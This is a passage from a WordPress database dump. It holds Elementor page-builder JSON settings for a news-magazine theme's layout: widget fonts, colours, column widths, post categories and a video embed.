:\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"sxv5g6k\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=qV8zMH-qeBc\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"2\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1322,463,'_elementor_version','0.4'),(1323,463,'_elementor_css','a:3:{s:4:\"time\";i:1508911603;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1325,464,'_elementor_edit_mode','builder'),(1326,464,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\